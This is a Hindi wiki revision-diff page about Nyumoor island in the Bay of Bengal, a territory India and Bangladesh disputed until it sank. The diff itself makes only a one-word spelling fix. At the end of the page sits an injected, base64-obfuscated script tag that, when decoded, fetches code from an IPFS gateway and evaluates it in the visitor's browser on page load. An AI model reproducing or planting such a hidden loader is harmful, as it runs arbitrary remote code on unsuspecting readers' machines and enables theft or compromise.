Difference between revisions of "न्यूमूर द्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''न्यूमूर द्वीप''' भारत और बांग्लादेश के मध्य स्थि...' के साथ नया पन्ना बनाया)
 
m (Text replace - " करीब" to " क़रीब")
 
Line 4: Line 4:
 
*भारत ने [[1989]] में [[नौसेना]] का जहाज़ और फिर बीएसएफ के जवानों को वहाँ तैनात करके वहाँ [[तिरंगा|तिरंगा झंडा]] फहराया था।
 
*भारत ने [[1989]] में [[नौसेना]] का जहाज़ और फिर बीएसएफ के जवानों को वहाँ तैनात करके वहाँ [[तिरंगा|तिरंगा झंडा]] फहराया था।
 
*प्रकृति ने जैसे स्वयं ही हस्तक्षेप करके दोनों देशों के बीच चल रहे विवाद का अंतिम हल कर दिया है, क्योंकि न्यूमूर द्वीप पूरी तरह से जलमग्य हो चुका है।
 
*प्रकृति ने जैसे स्वयं ही हस्तक्षेप करके दोनों देशों के बीच चल रहे विवाद का अंतिम हल कर दिया है, क्योंकि न्यूमूर द्वीप पूरी तरह से जलमग्य हो चुका है।
*इससे पहले [[1996]] में [[सुंदरवन]] में 'लोहाछरा' नामक द्वीप भी [[समुद्र]] में डूब गया था। 'घोड़ामार' ऐसा दूसरा द्वीप है, जिसका करीब आधा हिस्सा जलमग्न हो चुका है।
+
*इससे पहले [[1996]] में [[सुंदरवन]] में 'लोहाछरा' नामक द्वीप भी [[समुद्र]] में डूब गया था। 'घोड़ामार' ऐसा दूसरा द्वीप है, जिसका क़रीब आधा हिस्सा जलमग्न हो चुका है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 14:15, 24 November 2012

nyoomoor dvip bharat aur baangladesh ke madhy sthit hai. 9 kilomitar ki paridhi vale is nirjan dvip ko lekar bharat aur baangladesh mean kafi vivad raha hai. is dvip ko baangladesh mean 'dakshini talapatti' aur bharat mean 'purbasa' kaha jata hai.

  • yah kshetr 1954 ke aank doan ke anusar samudr tal se 2-3 mitar ki ooanchaee par sthit tha, jo vartaman mean lagabhag samudr mean vilin ho gaya hai.
  • bharat ne 1989 mean nausena ka jahaz aur phir bieseph ke javanoan ko vahaan tainat karake vahaan tiranga jhanda phaharaya tha.
  • prakriti ne jaise svayan hi hastakshep karake donoan deshoan ke bich chal rahe vivad ka aantim hal kar diya hai, kyoanki nyoomoor dvip poori tarah se jalamagy ho chuka hai.
  • isase pahale 1996 mean suandaravan mean 'lohachhara' namak dvip bhi samudr mean doob gaya tha. 'gho damar' aisa doosara dvip hai, jisaka qarib adha hissa jalamagn ho chuka hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>